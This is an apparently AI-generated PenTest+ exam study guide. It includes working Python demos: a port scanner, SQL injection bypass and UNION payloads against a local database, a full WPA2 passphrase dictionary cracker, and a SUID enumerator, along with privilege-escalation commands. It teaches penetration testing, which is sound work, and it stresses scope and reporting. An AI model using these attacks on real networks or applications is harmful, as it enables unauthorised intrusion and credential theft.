CompTIA PenTest+ PT0-002 Attacks Exploits and Reporting
AI-Generated Content
To become a competent penetration tester, you must master more than just finding vulnerabilities; you must ethically exploit them to demonstrate real risk and communicate findings effectively. The CompTIA PenTest+ PT0-002 exam validates this critical lifecycle, testing your ability to move from initial access to detailed reporting.
Reconnaissance and Initial Attack Vectors
Before any exploit can be launched, thorough reconnaissance sets the stage. This phase involves passive information gathering (collecting data from public sources such as DNS records, certificate transparency logs and job postings, without touching the target) and active reconnaissance (directly probing the target to map the network and discover live hosts and services). For the exam, you must understand tools like Nmap for port scanning and the difference between a TCP SYN scan (-sS), which sends a SYN and tears the connection down after the SYN/ACK without completing the handshake and therefore needs raw-socket (root) privileges, and a full TCP connect scan (-sT), which completes the three-way handshake through the normal socket API and so shows up in the target service's logs.
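To make the -sS versus -sT distinction concrete, here is an added example (not code from the original page) of a connect scan written with plain sockets. It starts a throwaway listener on loopback as a constructed target, then scans one open and one closed port the way Nmap -sT does: a full connect() per port, classified by whether the handshake completed, a RST came back, or nothing answered. The comments note why a SYN scan cannot be written this way.

```python
import socket

def start_listener() -> socket.socket:
    """Start a throwaway TCP service on loopback to stand in for a target host
    (constructed for this example; port 0 lets the OS pick a free port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)   # the kernel completes handshakes into the backlog; no accept() needed
    return srv

def find_closed_port() -> int:
    """Reserve and release a loopback port so the scan has a known-closed port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

def connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """TCP connect scan, the equivalent of `nmap -sT`.

    connect() completes the full three-way handshake, so no raw sockets or root
    privileges are needed, but the target service sees an established (then
    closed) connection and may log it. A SYN scan (`nmap -sS`) instead crafts a
    raw SYN, reads the SYN/ACK or RST, and answers with RST without finishing
    the handshake; that is why it needs raw-socket privileges and leaves fewer
    application-level log entries.
    """
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                results[port] = "open"          # SYN/ACK came back, handshake done
            except ConnectionRefusedError:
                results[port] = "closed"        # RST came back: nothing listening
            except (socket.timeout, OSError):
                results[port] = "filtered"      # no answer: something is dropping packets
    return results

if __name__ == "__main__":
    listener = start_listener()
    open_port = listener.getsockname()[1]
    closed_port = find_closed_port()
    for port, state in connect_scan("127.0.0.1", [open_port, closed_port]).items():
        print(f"127.0.0.1:{port} {state}")
    listener.close()
```

The "filtered" branch is the one to watch in real engagements: a firewall that silently drops SYNs makes every probe wait for the full timeout, which is why Nmap's timing templates matter on large scopes.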
The initial compromise usually comes from one of several key vectors. Network-based attacks target exposed services and protocols: exploiting a vulnerable service such as SMB (the EternalBlue exploit for MS17-010 is the standard example) or using ARP poisoning to redirect a LAN segment's traffic through the attacker's host in a man-in-the-middle (MitM) attack. You should be able to explain how an attacker uses a framework like Metasploit to select an exploit module for a known vulnerability on an open port, pick a payload, and obtain a session.
Social engineering techniques manipulate human psychology to gain access or information. This encompasses phishing (deceptive emails), vishing (voice calls), and pretexting (creating a fabricated scenario). For the PenTest+, you need to know how these techniques are used in engagements, such as crafting a phishing campaign to steal credentials, which is often a simpler path than technical exploitation.
Web, Wireless, and Specialized System Exploitation
Web application exploits are a major focus because of how many are exposed. You must understand injection attacks, notably SQL injection (SQLi), where attacker-supplied input is concatenated into a query and interpreted as SQL, letting the attacker bypass authentication or read and modify the backend database. Similarly, cross-site scripting (XSS) involves injecting malicious scripts (reflected, stored or DOM-based) into web pages viewed by other users. The exam will test your knowledge of identifying and exploiting these flaws, potentially using a tool like sqlmap for automated SQLi detection and exploitation, and of the fix you should recommend: parameterized queries for SQLi and context-appropriate output encoding for XSS.
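The following added example (not from the original page) shows SQL injection end to end against an in-memory SQLite database with constructed sample users: the string-built login query, the authentication-bypass and UNION-extraction payloads that work against it, the parameterized version that resists both, and the true/false boolean probe that sqlmap uses to detect injectable parameters. The table, user names and passwords are all made up for the demo.

```python
import sqlite3

def build_demo_db() -> sqlite3.Connection:
    """In-memory SQLite database with constructed sample users (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret!", "admin"), ("bob", "hunter2", "user")],
    )
    conn.commit()
    return conn

def login_vulnerable(conn, username: str, password: str) -> list:
    """The injectable version: user input is concatenated straight into SQL."""
    query = (
        f"SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()

def login_safe(conn, username: str, password: str) -> list:
    """The fix: bound parameters keep input as data, never as SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()

def boolean_probe(login, conn, known_user: str = "alice") -> bool:
    """Boolean-based SQLi detection in the style of sqlmap: inject a true and a
    false condition behind a known-good value and compare the responses.
    Different results mean the input reached the SQL parser."""
    true_case = login(conn, f"{known_user}' AND 1=1 --", "x")
    false_case = login(conn, f"{known_user}' AND 1=2 --", "x")
    return true_case != false_case

if __name__ == "__main__":
    conn = build_demo_db()
    # Authentication bypass: close the quote, OR in a tautology, comment out the rest.
    print(login_vulnerable(conn, "' OR 1=1 --", "wrong"))
    # Data extraction: UNION pulls the password column into the result set.
    print(login_vulnerable(conn, "' UNION SELECT username, password FROM users --", "wrong"))
    print(login_safe(conn, "' OR 1=1 --", "wrong"))       # no rows
    print(boolean_probe(login_vulnerable, conn), boolean_probe(login_safe, conn))
```

The probe is the part worth internalizing: sqlmap's "boolean-based blind" technique is exactly this differential, repeated with many payload encodings, and it works even when the application never displays query results.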
Wireless attacks target the protocols and configurations of Wi-Fi networks. The classic attack against WPA2-Personal is to capture a client's four-way handshake and run an offline dictionary attack against the pre-shared key with Aircrack-ng: because the key is derived from the passphrase and the SSID, each captured handshake can be checked against a wordlist without any further contact with the network. You also need to understand evil twin attacks, where a malicious access point is set up with a legitimate-sounding name to trick users into connecting, enabling credential harvesting. For the exam, know the steps and the tool that performs each: put the adapter in monitor mode (airmon-ng), capture traffic on the target channel (airodump-ng), deauthenticate a connected client so it reconnects and reveals the handshake (aireplay-ng), then crack (aircrack-ng).
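To show what the cracking step actually computes, here is an added example, not code from the original page or from the Aircrack-ng project. It implements the WPA2-Personal key derivation (PBKDF2 for the PMK, the 802.11i PRF for the PTK, HMAC-SHA1 for the EAPOL-Key MIC), builds a constructed handshake message 2 for a made-up network, and then recovers the passphrase from a small wordlist by re-deriving the MIC for each guess. The SSID, MAC addresses, nonces, passphrase and wordlist are all invented for the demo.

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # EAPOL header (4) + descriptor fields up to the Key MIC field

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the slow step: every guess costs 4096 HMACs, and the SSID salt means
    precomputed tables only help for common SSIDs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]   # KCK = PTK[0:16] is the only part the attacker needs

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for an RSN (WPA2) EAPOL-Key frame with descriptor version 2:
    HMAC-SHA1 over the whole frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_msg2(snonce: bytes) -> bytes:
    """Constructed handshake message 2 (client -> AP) with an all-zero MIC field."""
    body = (
        b"\x02"                            # descriptor type: RSN
        + struct.pack(">H", 0x010A)        # key info: version 2 (HMAC-SHA1), pairwise, MIC set
        + struct.pack(">H", 16)            # key length
        + struct.pack(">Q", 1)             # replay counter
        + snonce                           # 32-byte SNonce
        + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID
        + bytes(16)                        # key MIC (filled in by the sender)
        + struct.pack(">H", 0)             # key data length
    )
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL v2, type Key

def simulate_capture(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """Produce what airodump-ng would capture: message 2 carrying a valid MIC."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = build_msg2(snonce)
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]

def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, captured: bytes, wordlist):
    """Offline dictionary attack, the core of `aircrack-ng -w wordlist`: derive the
    KCK for each candidate and check whether it reproduces the captured MIC."""
    target_mic = captured[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured), target_mic):
            return candidate
    return None

# Constructed handshake parameters (not taken from any real network).
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"anonce").digest()
SNONCE = hashlib.sha256(b"snonce").digest()
WORDLIST = ["password", "letmein", "Winter2023!", "CorpGuest1"]

if __name__ == "__main__":
    capture = simulate_capture("Winter2023!", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    print("recovered:", crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, capture, WORDLIST))
```

Two details matter in practice: the attacker needs both MAC addresses and both nonces, which is why a complete (or at least messages 1 and 2 of a) handshake must be captured, and the SSID is the PBKDF2 salt, so a deauth against the wrong BSSID yields a handshake that no wordlist will ever crack.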
Modern environments require knowledge of cloud-based attacks and mobile device exploitation. Cloud attacks might focus on misconfigured storage buckets (like public S3 buckets), weak Identity and Access Management (IAM) policies, or exploiting serverless functions. Mobile exploitation could involve analyzing insecure mobile applications (APK files) for hardcoded credentials or insecure data storage. The PenTest+ expects you to adapt traditional attack methods to these newer architectures.
Post-Exploitation: Maintaining Access and Moving Laterally
Gaining an initial shell is just the beginning. Post-exploitation activities are about deepening access and understanding the value of the compromised system. The first major goal is privilege escalation. This can be vertical (moving from a user account to an administrator or root account) or horizontal (moving to another user with similar privileges but access to different data or systems). You need to know common methods: exploiting kernel vulnerabilities (first identify the version with uname -a, then match it against known exploits) and abusing misconfigured permissions, such as over-broad sudo rules (listed with sudo -l) or SUID binaries (found with find / -perm -4000 -type f 2>/dev/null).
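As an added example (not from the original page), the function below performs the SUID/SGID hunt from the paragraph above in Python rather than with find, so the same logic can run from a restricted shell or be dropped into an enumeration script. It walks a directory tree, reports every regular file with the setuid or setgid bit, and separates out binaries that are not on a baseline list of normally-SUID programs. The baseline set is an assumption for the demo; the helper that builds a temporary directory with a fake SUID file exists only so the code can be exercised without root.

```python
import os
import stat
import tempfile

# Programs that are normally SUID root on a Linux system (assumed baseline; tune per distro).
EXPECTED_SUID = {"sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
                 "mount", "umount", "ping", "pkexec", "fusermount"}

def find_setuid_files(root: str) -> list:
    """Walk `root` and return (path, mode, uid) for regular files with SUID or SGID set,
    the Python equivalent of `find <root> -type f -perm /6000`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)        # lstat: do not follow symlinks
            except OSError:
                continue                   # unreadable or vanished; keep walking
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, stat.S_IMODE(st.st_mode), st.st_uid))
    return hits

def suspicious_setuid(hits, expected=EXPECTED_SUID) -> list:
    """Keep only files whose basename is not a known SUID program: custom helpers,
    backup scripts or copied shells with SUID root are classic escalation paths."""
    return [h for h in hits if os.path.basename(h[0]) not in expected]

def make_demo_tree() -> str:
    """Constructed test fixture: a temp dir with one fake SUID binary and one plain file.
    Setting the bit on a file you own needs no root; it only affects execution."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    suid_path = os.path.join(root, "backup_helper")
    plain_path = os.path.join(root, "README")
    for p in (suid_path, plain_path):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(suid_path, 0o4755)
    os.chmod(plain_path, 0o644)
    return root

if __name__ == "__main__":
    root = make_demo_tree()
    for path, mode, uid in suspicious_setuid(find_setuid_files(root)):
        print(f"{oct(mode)} uid={uid} {path}")
    # On a real host: suspicious_setuid(find_setuid_files("/")) and inspect each hit.
```

Treat the output as a work list, not a verdict: a hit is only exploitable if it is owned by root (uid 0), executable by you, and does something abusable (spawns a shell, reads arbitrary files, honors PATH or environment), which is what resources such as GTFOBins catalogue.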
Once elevated, lateral movement is the process of pivoting from the initially compromised host to other systems on the network. Techniques include pass-the-hash (authenticating over NTLM with a stolen NT hash, which works because the protocol never requires the plaintext password) and using stolen credentials with tools like PsExec. The key for the exam is understanding the tools and protocols used for lateral movement, such as SMB, RDP, and WinRM, and how to use Meterpreter sessions (routes and port forwards through the compromised host) to pivot into network segments you cannot reach directly.
To ensure you can return, you must establish persistence. This involves mechanisms that survive reboots and user logoffs. Examples include creating scheduled tasks (cron jobs on Linux, Task Scheduler on Windows), installing backdoor services, or adding registry run keys. A test question might ask you to identify the most stealthy persistence mechanism in a given scenario, weighing detectability against reliability.
Analysis, Tools, and Professional Reporting
Throughout the engagement, you will use a suite of penetration testing tools. The exam doesn't require command memorization but expects you to know the purpose and typical use case for tools in categories like vulnerability scanners (Nessus, OpenVAS), exploitation frameworks (Metasploit), proxy tools (Burp Suite, OWASP ZAP), and credential cracking tools (John the Ripper, Hashcat). You must be able to analyze tool output to determine the next logical step in an attack chain.
The ultimate deliverable is the penetration test report. This is where your technical work translates into business value. A professional report includes an executive summary for leadership, a detailed technical findings section, and prioritized remediation recommendations. Each finding should clearly link a vulnerability (e.g., "Unpatched Apache Struts instance") to the exploit used, the impact (e.g., "Remote Code Execution"), and a concrete remedial action (e.g., "Apply patch version X.Y.Z"). For the exam, understand how to score findings using standardized systems like the Common Vulnerability Scoring System (CVSS) to communicate severity objectively.
Common Pitfalls
- Focusing Only on Exploitation: A common mistake is rushing to exploit without proper reconnaissance or documentation. On the exam and in real work, failing to scope the engagement properly or document your steps can lead to missed vulnerabilities or an invalidated test. Always follow a structured methodology.
- Ignoring the Cleanup Phase: After the test, you must remove all persistence mechanisms, shells, and tools deployed. Neglecting this post-engagement cleanup can leave the client's systems in a more vulnerable state than when you started, which is unethical and unprofessional. Exam scenarios may test your knowledge of this crucial phase.
- Writing Vague Reports: Reporting "system is vulnerable" without proof, clear impact, or actionable steps is a critical failure. The exam will expect specific, evidence-based findings. Your recommendations must be practical and prioritized, not just a list of CVEs. A finding without a clear remediation path is of little use to the client.
- Misunderstanding Scope and Rules of Engagement: Attempting attacks on systems not listed in the scope (like attacking a client's cloud production environment when only the test environment was authorized) is a serious ethical and legal breach. Exam questions often include scenarios where you must identify the correct action based on the defined Rules of Engagement (RoE).
Summary
- A successful penetration test follows a structured flow: reconnaissance, scanning, exploitation, post-exploitation, and reporting.
- You must be proficient across multiple attack vectors, including network services, web applications, wireless systems, and human elements via social engineering.
- Post-exploitation is critical and involves privilege escalation, lateral movement, and establishing persistence to fully assess the security posture of an environment.
- The use of appropriate tools is essential, but your ability to analyze their output and pivot your strategy is what demonstrates skill.
- The final report is your primary deliverable; it must translate technical findings into business risk with clear, actionable remediation recommendations for the client.
- Always operate strictly within the agreed-upon scope and Rules of Engagement, and ensure you clean up all artifacts after the test concludes.